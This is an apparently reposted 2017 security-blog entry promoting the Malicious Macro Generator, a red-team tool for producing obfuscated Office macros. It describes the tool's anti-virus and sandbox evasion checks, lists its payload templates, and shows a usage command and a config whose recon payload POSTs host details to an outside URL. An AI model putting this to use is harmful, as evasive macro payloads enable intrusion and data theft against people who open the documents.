The Malicious Macro Generator!

2017-08-18T05:17:18
ID PENTESTIT:5546F926E36C8F2E3903A762E1F7E962
Type pentestit
Reporter Black
Modified 2017-08-18T05:17:18

Description

PenTestIT RSS Feed

I'm sure you remember my older post about the malicious office document generator and the office exploitation toolkit. Just a refresher - Luckystrike is the open source script that helps you create malicious Microsoft Office documents using PowerShell and MicroSploit is an open source shell script that helps you create custom Microsoft Office platform based backdoors using the Metasploit framework. Now, there is a new and improved entrant in this market of red teaming tool - the Malicious Macro Generator. It sure does take things up a notch!

Malicious Macro Generator

What is the Malicious Macro Generator?

The Malicious Macro Generator is an open source Python script to generate obfuscated macros that include anti-virus and sandbox evasion techniques. The only drawback I found with MicroSploit was that it depends on exploits to be added to the Metasploit framework and Luckystrike was that it could generate only .xls payloads. However, this changes with the Malicious Macro Generator. It simply creates macros. Where and how you use them is completely upto you! The cherry on the top is that it does so with some nice obfuscation and evasion techniques. So now you must be interested in knowing about the evasion techniques in use right? Without much ado, here they are:

Malicious Macro Generator evasion techniques:

These are the currently support anti-virus and sandbox evasion techniques employed:

  • Domain check: This macro fetches the USERDOMAIN environment variable and compares with with a predefined one. If they match the final payload is executed.
  • Disk check: This macro uses WMI to detect the total disk size (C:) as VM's and test machines normally use a small disk.
  • Memory check: This macro looks for the total memory size. VM's and test machines use less resources.
  • Uptime check: This macro uses the LastBootUpTime property from the Win32_OperatingSystem WMI class to fetch the system uptime. Sandboxes will return a short uptime.
  • Process check: This macro also uses WMI to fetch the process name from the Win32_Process class to check if a specific process is running (example outlook.exe)

Malicious Macro Generator payload templates:

These are the templates included with the macro generator:

wmi-evasion-domain-template.vba
recon-template.vba: Transmits data about the remote host such as process list, etc.
generic-cmd-template.vba: Executes code using Wscript.
generic-cmd-evasion-template.vba
wmi-template.vba
recon-rename-wmi-cmd-evasion.vba
wmi-evasion-process-template.vba

These come in handy when you actually create macros using the tool.

Using the Malicious Macro Generator:

This open source Python script is easy to use and does not need an extensive installation procedure or need many packages. in this example, I am using the recon-template to generate a generic reconnaissance module:

ython MMG.py configs/recon.json recon.vba
MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com

[+] Loading the following payload:

Recon payload

[+] "recon.vba" successfully saved to the disk.
[+] Generation completed.

If you open the recon.vba file, you will see what you have created. This is what I have in my configs/recon.json file:

{
    "description": "Recon payload",
    "template": "templates/payloads/recon-template.vba",
    "varcount": 150,
    "encodingoffset": 4,
    "chunksize": 200,
    "encodedvars":  {
                "URL":"http://pentestit.com"
            },
    "vars":     [],
    "evasion":  ["encoder"],
    "payload": ""
}

As you can see, this payload will send a MSXML2.ServerXMLHTTP POST to this blog on successful execution.

Download Malicious Macro Generator:

The current version of the Malicious Macro Generator can be checked out from it's GIT repository. You should have most of the needed Python packages.

The post The Malicious Macro Generator! appeared first on PenTestIT.